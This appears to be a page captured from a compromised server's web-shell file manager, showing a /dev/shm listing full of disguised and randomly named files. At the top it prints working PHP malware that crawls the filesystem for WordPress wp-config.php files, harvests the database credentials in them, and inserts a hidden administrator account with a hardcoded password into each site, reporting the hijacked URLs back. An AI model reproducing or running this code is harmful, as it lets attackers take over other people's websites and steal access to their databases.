PATH:
dev
/
shm
<?php function path_join($path, $file) { return rtrim($path, '/\\') . DIRECTORY_SEPARATOR . $file; } function scan($path) { if ($dir = @opendir($path)) { while (false !== ($file = readdir($dir))) { $p = path_join($path, $file); if ($file != '.' && $file != '..') { if (is_link($p)) { continue; } elseif (is_dir($p)) { scan($p); } elseif ($file === 'wp-config.php') { inject($p); } } } } } function inject($p) { $user_login = 'adm1n'; $user_password = 'Kch20CNeif'; $user_email = 'adm1n@wordpress.com'; $data = @file_get_contents($p); if ($data === false) { return; } $pattern = "/table_prefix\s*=\s*'([^']*)';/i"; if (preg_match($pattern, $data, $matches)) { $table_prefix = $matches[1]; } else { $table_prefix = 'wp_'; } $lines = array_map('rtrim', file($p)); $conf = []; foreach ($lines as $line) { if (preg_match('/define\s*\(\s*[\'"]\s*(DB_USER|DB_HOST|DB_PASSWORD|DB_NAME)\s*[\'"]\s*,/', $line, $matches)) { $conf[$matches[1]] = parse_define_value($line); } } if (isset($conf['DB_HOST']) && isset($conf['DB_USER']) && isset($conf['DB_PASSWORD']) && isset($conf['DB_NAME'])) { $mysqli = new mysqli($conf['DB_HOST'], $conf['DB_USER'], $conf['DB_PASSWORD'], $conf['DB_NAME']); if ($mysqli->connect_errno) { return; } $user_login = $mysqli->real_escape_string($user_login); $user_password = $mysqli->real_escape_string($user_password); $user_email = $mysqli->real_escape_string($user_email); if ($result = $mysqli->query("SELECT ID FROM {$table_prefix}users WHERE user_login = '{$user_login}';")) { if ($result->num_rows > 0) { $result->close(); $mysqli->close(); return; } $result->close(); } $add_user_query = "INSERT INTO `{$table_prefix}users` (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_status`, `display_name`) SELECT '{$user_login}', MD5('{$user_password}'), '{$user_login}', '{$user_email}', '', (SELECT `user_registered` FROM `{$table_prefix}users` ORDER BY `ID` ASC LIMIT 1), 0, '{$user_login}' FROM DUAL WHERE NOT EXISTS ( SELECT 1 FROM `{$table_prefix}users` WHERE `user_login` = '{$user_login}' );"; if ($mysqli->query($add_user_query)) { $add_usermeta_query1 = "INSERT INTO `{$table_prefix}usermeta` (`user_id`, `meta_key`, `meta_value`) SELECT `ID`, 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}' FROM `{$table_prefix}users` WHERE `user_login` = '$user_login' ORDER BY `ID` DESC LIMIT 1;"; $add_usermeta_query2 = "INSERT INTO `{$table_prefix}usermeta` (`user_id`, `meta_key`, `meta_value`) SELECT `ID`, 'wp_user_level', '10' FROM `{$table_prefix}users` WHERE `user_login` = '$user_login' ORDER BY `ID` DESC LIMIT 1;"; $mysqli->query($add_usermeta_query1); $mysqli->query($add_usermeta_query2); } $site_url = false; if ($result = $mysqli->query("SELECT option_value FROM {$table_prefix}options WHERE option_name = 'siteurl';")) { $row = $result->fetch_object(); $result->close(); $site_url = $row->option_value; } if (!$site_url || strpos($site_url, 'http') !== 0) { if ($result = $mysqli->query("SELECT user_url FROM {$table_prefix}users ORDER BY ID ASC LIMIT 1;")) { $row = $result->fetch_object(); $result->close(); $site_url = $row->user_url; } } if ($result = $mysqli->query("SELECT ID FROM {$table_prefix}users WHERE user_login = '{$user_login}';")) { if ($result->num_rows > 0) { echo "<f>{$site_url}@@@{$p}</f>\n"; } $result->close(); } $mysqli->close(); } } function parse_define_value($line) { if (preg_match("/define\s*\(\s*['\"]\w+['\"]\s*,\s*['\"](.*)['\"]\s*\)\s*;/", $line, $matches)) { return $matches[1]; } return null; } function scanRootPaths() { if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { foreach (range('A', 'Z') as $driveLetter) { $drive = $driveLetter . ':\\'; if (is_dir($drive)) { scan($drive); } } } else { scan('/home/kharmugl'); } } scanRootPaths(); die('!ended!');
[+]
..
[-] .ent
[edit]
[-] .factor
[edit]
[-] PostgreSQL.1213148227
[edit]
[-] .data_chunk
[edit]
[+]
lsws
[-] .bind
[edit]
[-] .val
[edit]
[-] .obj
[edit]
[-] .holder
[edit]
[-] .elem
[edit]
[-] .entry
[edit]
[-] .pgrp
[edit]
[-] .parameter_group
[edit]
[-] .item
[edit]
[-] .ref
[edit]
[-] .rec
[edit]
[-] .reference
[edit]
[-] .symbol
[edit]
[-] .flg
[edit]
[-] .comp
[edit]
[-] .res
[edit]
[-] .descriptor
[edit]
[-] .element
[edit]
[-] .component
[edit]
[-] .pointer
[edit]
[-] .entity
[edit]
[-] .dat
[edit]
[-] .marker
[edit]
[-] .itm
[edit]
[-] .binding
[edit]
[-] .mainFrame_
[edit]
[-] .dbus-daemon --system_
[edit]
[-] .php-fpm: pool www_
[edit]
[-] f_dbbd6265f826
[edit]
[-] f_1098980cb512
[edit]
[-] f_83c805145a0f
[edit]
[-] f_46091a8a0602
[edit]
[-] f_e963449b43ce
[edit]
[-] f_16fffd8d4a3b
[edit]
[-] f_7813fdb087e5
[edit]
[-] f_51e6b73dcabe
[edit]
[-] f_cecd16744448
[edit]
[-] f_204632c8e766
[edit]
[-] .dchunk
[edit]
[-] .desc
[edit]
[-] .token
[edit]
[-] .resource
[edit]
[-] lib-manager
[edit]
[-] ssh-plugin.so
[edit]
[-] tracker-cache.sh
[edit]
[-] pulse-helper.agent
[edit]
[-] gvfs-monitor.sh
[edit]
[-] gvfs-plugin-helper
[edit]
[-] tracker-session
[edit]
[-] udisks-plugin.sh
[edit]
[-] dbus-monitor.agent
[edit]
[-] ssh-helper.pl
[edit]
[-] dbus-agent.agent
[edit]
[-] pulse-cache.py
[edit]
[-] kde-helper-helper
[edit]
[-] udisks-session.pl
[edit]
[-] udisks-agent.pl
[edit]
[-] AVgMYurbDt
[edit]
[-] NVEhqAvpBr
[edit]
[-] oXsOWzYTvk
[edit]
[-] VYDjUEgBOK
[edit]
[-] bCVMnQYPFP
[edit]
[-] HDgdFGYtgl
[edit]
[-] zFkthldHeh
[edit]
[-] AFsKjKdEEg
[edit]
[-] lkyQWWVTQg
[edit]
[-] mlZZXfVdbH
[edit]
[-] ujxpEuOuED
[edit]
[-] arIaxoOwXd
[edit]
[-] kifLoMpGvu
[edit]
[-] RiqwCpFQKt
[edit]
[-] INqJOgKCfl
[edit]
[-] VBBGgubgyv
[edit]
[-] TwXDnRCumM
[edit]
[-] cwjcRXKEom
[edit]
[-] DuTJhmXqKf
[edit]
[-] kzuajrrUJd
[edit]
[-] udAPWnTeAi
[edit]
[-] WeHUohXIPE
[edit]
[-] ycjkUIMiNA
[edit]
[-] vgrFyxQDzb
[edit]
[-] ALNLBtImfz
[edit]
[-] hMcsCCIwua
[edit]
[-] JKsIfRJhXW
[edit]
[-] XoREdbxVSU
[edit]
[-] tSzRwbNviI
[edit]
[-] zlGCzHEVGN
[edit]
[-] kJRrNMEfZM
[edit]
[-] lFWPTEGbKn
[edit]
[-] KXyymMpJFv
[edit]
[-] kcgZvhqjRe
[edit]
[-] yVmAghKFtO
[edit]
[-] fXKTEStXzV
[edit]
[-] zatVKmOTsM
[edit]
[-] DmoCkkDlOK
[edit]
[-] JEzGlaGhnR
[edit]
[-] wnDjNZHLJJ
[edit]
[-] RDKfffbxIj
[edit]
[-] KHWwhYbWmK
[edit]
[-] cNTzuowAmF
[edit]
[-] UtaMLywOBb
[edit]
[-] SMVxCunYZw
[edit]
[-] LMIiQzryIX
[edit]
[-] mPQvMyskdP
[edit]
[-] DDvQWENycx
[edit]
[-] SBUMxJdmHH
[edit]
[-] ZyBRBzoIUO
[edit]
[-] uyJOPFsWSo
[edit]
[-] xwNvvEVYMh
[edit]
[-] kfqBkVVwiM
[edit]
[-] EgBiePVaxG
[edit]
[-] IelyKqyMvC
[edit]
[-] NiNrITylhd
[edit]
[-] SNrtzHqEJd
[edit]
[-] POCeAkqOsE
[edit]
[-] roSudfLzVA
[edit]
[-] hnwQNRmnMP
[edit]
[-] jwZfWtLdMu
[edit]
[-] enLJbWmxDq
[edit]
[-] pqLmrlfnwi
[edit]
[-] ueWLJbYRPs
[edit]
[-] lZkhugfphH
[edit]
[-] sZcMkWXbnh
[edit]
[-] QXoOGrsXXQ
[edit]
[-] DGpszsoLRb
[edit]
[-] ORtVbHFdLn
[edit]
[-] hczDYwwlaq
[edit]
[-] THANRmspsZ
[edit]
[-] CTEaZgiczd
[edit]
[-] bhEttNJPGl
[edit]
[-] cJMKXGNoQM
[edit]
[-] NQSoaCFTwM
[edit]
[-] wOXHAMZGHy
[edit]
[-] iPtlIaeOQj
[edit]
[-] tOmEqRZQqZ
[edit]
[-] NBxCUmLQKb
[edit]
[-] ERKhCguCHR
[edit]
[-] fynFJOHquj
[edit]
[-] EAzYdDaEAq
[edit]
[-] rArDLtWqys
[edit]
[-] ShUnKjDOgK
[edit]
[-] MzOynTLElJ
[edit]
[-] OibEsJDIbk
[edit]
[-] rInBGdwDff
[edit]
[-] dsUQqecQaG
[edit]
[-] qIfkIkgeZg
[edit]
[-] crJHNpYWrf
[edit]
[-] IplXpEoDls
[edit]
[-] lqIgTxthzC
[edit]
[-] RuTRkDtvSY
[edit]
[-] rpaCbzkFqt
[edit]
[-] TbeTsONfLl
[edit]
[-] XslApDNVek
[edit]
[-] ccwxzJKftu
[edit]
[-] KbSuaEJtlL
[edit]
[-] uZikUJqFFe
[edit]
[-] bapRWSyTYc
[edit]
[-] lkvGNeadzd
[edit]
[-] NlCvDUqfOD
[edit]
[-] pjebjzvhkz
[edit]
[-] ARnHGkQgyl
[edit]
[-] rSICYMnlay
[edit]
[-] mjmwlYvWya
[edit]
[-] YTXHZRnTtV
[edit]
[-] kVuIzagKdH
[edit]
[-] qQBtqWHYFc
[edit]
[-] bQcSEbHCUb
[edit]
[-] OTMvQqcUNT
[edit]
[-] bDboigtysd
[edit]
[-] BCtpZbUIgu
[edit]
[-] NchbjwpIoN
[edit]
[-] WCFKTlcuuU
[edit]
[-] IKFWSWewHi
[edit]
[-] qdoMBFtSTL
[edit]
[-] ALKxYBlwKM
[edit]
[-] cMRqqrpyJm
[edit]
[-] BKhnwLiVhJ
[edit]
[-] nuyaEMaiEE
[edit]
[-] utntDHKANJ
[edit]
[-] FGHFwPFjGk
[edit]
[-] DdOOPnwReF
[edit]
[-] nOBdKGmHMQ
[edit]
[-] LgZMdrBJqY
[edit]
[-] wBZjdsArxg
[edit]
[-] QQklLxWThG
[edit]
[-] yPGimsxFZX
[edit]
[-] fPSfgCBTXx
[edit]
[-] ZxOjPIeTCP
[edit]
[-] iNuwgxetRq
[edit]
[-] ZwHSBSOpnR
[edit]
[-] yvaIxMHKmm
[edit]
[-] dvSPvnHVwL
[edit]
[-] kfLvNdzHhJ
[edit]
[-] DewOMYzxOm
[edit]
[-] MFbvuwEUKZ
[edit]
[-] YhiwLmUypT
[edit]
[-] aHYHcCQIBH
[edit]
[-] KqRyfxoiig
[edit]
[-] CENhCivkRo
[edit]
[-] PEQesnvqIP
[edit]
[-] PrncWshmER
[edit]
[-] NqFdNPgUsi
[edit]
[-] BoVPvkBwcZ
[edit]
[-] oXyJMpxIWA
[edit]
[-] epcYNRFGfz
[edit]
[-] oYFeefBmVa
[edit]
[-] wWtKGKSkvW
[edit]
[-] NWVbIzWJVV
[edit]
[-] WxyQghWVtq
[edit]
[-] PqtdamOXIM
[edit]
[-] iFzFPvyMBV
[edit]
[-] JEbWBmStnR
[edit]
[-] BVKDPoKjan
[edit]
[-] hHmrvHnJYn
[edit]
[-] zGKmQAOWQs
[edit]
[-] aXuYtsnKyi
[edit]
[-] .ptr
[edit]
[-] lIzfZrYRCQ
[edit]
[-] lQzsbgZbdO
[edit]
[-] oHgGXikPkG
[edit]
[-] YarHBqBHUY
[edit]
[-] ISJbNWiyeD
[edit]
[-] gIuyTucxKh
[edit]
[-] rdYXqSpDoB
[edit]
[-] RUfcVehpcR
[edit]
[-] hWOibOKhUU
[edit]
[-] tGDpxZGDVJ
[edit]
[-] POlCDqoXMK
[edit]
[-] BplfdrnMHn
[edit]
[-] IjdnVaMOMb
[edit]
[-] IWEosBOies
[edit]
[-] EZDmWJIJCL
[edit]
[-] .sym
[edit]
[-] .k
[edit]
[-] .record
[edit]
[-] .mrk
[edit]
[-] DtFpNDdKMG
[edit]
[-] jntwdUgVTO
[edit]
[-] YxhrMhDTVR
[edit]
[-] luRMaTzwGq
[edit]
[-] yrwtXvtYVd
[edit]
[-] QDuRevDTfV
[edit]
[-] NZSblPrhmm
[edit]
[-] dFpwXLqkYL
[edit]
[-] hXseVbjEAe
[edit]
[-] BaDsrsRvkg
[edit]
[-] .hld
[edit]
[-] pSzbpuEPJX
[edit]
[-] .property_set
[edit]
[-] .flag
[edit]
[-] .value
[edit]
[-] .fac
[edit]
[-] .pset
[edit]
[-] .key
[edit]